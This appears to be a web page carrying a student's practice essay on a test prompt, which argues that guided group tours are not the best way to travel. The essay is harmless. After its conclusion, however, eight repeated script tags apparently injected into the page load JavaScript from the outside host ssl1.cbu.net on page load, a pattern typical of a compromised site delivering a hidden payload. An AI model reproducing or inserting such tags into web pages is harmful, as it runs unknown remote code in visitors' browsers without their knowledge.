74.Do you agree or disagree with the following statement? The best way to travel is in a group led by a tour guide. Use specific reasons and examples to support your answer

I disagree that the best way to travel is in a group led by a tour guide. There are two reasons why I think this way. The first reason is that everything is scheduled in a tour guide. I think the point of traveling is relaxing and enjoying everything in that place. But travelers who travel with tour guides can’t make their own decision. The second reason is that we need to travel with strangers. I don’t like traveling with strangers. It is kind of awkward to travel with them and if they are rude, it will be annoying to travel with them.

The first reason why I disagree that the best way to travel is in a group led by a tour guide is that everything is scheduled. I think one of the reasons why people travel is to get out of their scheduled life. But everything on a tour with a tour guide is scheduled. The amount of time for us to eat, sleep, go to the bathroom and enjoy the view is limited. When the time is over, travelers must leave. Doing this will be terrible for travelers who came to relax and move slowly. So, everything is scheduled on a tour led by a tour guide. For example, my family doesn’t like to travel with a tour guide. Even though it is mostly cheaper and the guide can explain things for us. We don’t travel with a guide, because we are traveling to relax, not to only enjoy views. We don’t hurry ourselves during traveling. But we will have to hurry if we travel to a group because we don’t want to make others wait for us and the schedule is very tight. Therefore, I disagree that the best way to travel is in a group led by a tour guide.

The second reason why I disagree that the best way to travel is in a group led by a tour guide is that we need to travel with strangers. It is hard to have a personal guide for the trip because it cost a lot. The only way is to travel together with others. But sometimes traveling with a stranger can be hard. It is very awkward to travel with them and we both will have to match up with others. Also, a trip can turn terrible if we meet a rude person that we must travel with. So, traveling with a stranger can be tough. For example, I have once traveled with a group of people to a place in China. We decided to travel with a guide because it was very crowded and our Chinese was very poor at that time. Because it wasn’t run by a Korean company, people in that group were all Chinese except for me. There were some old people and they acted very rudely. They spat on the ground and took pictures every time they saw something interesting and didn’t care about others. Therefore, I disagree that the best way to travel is in a group led by a tour guide.

In conclusion, everything on a tour with a guide is scheduled. Also, we have to travel with strangers if we travel in a group with a tour guide. Therefore, I disagree that the best way to travel is in a group led by a tour guide.

<script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script>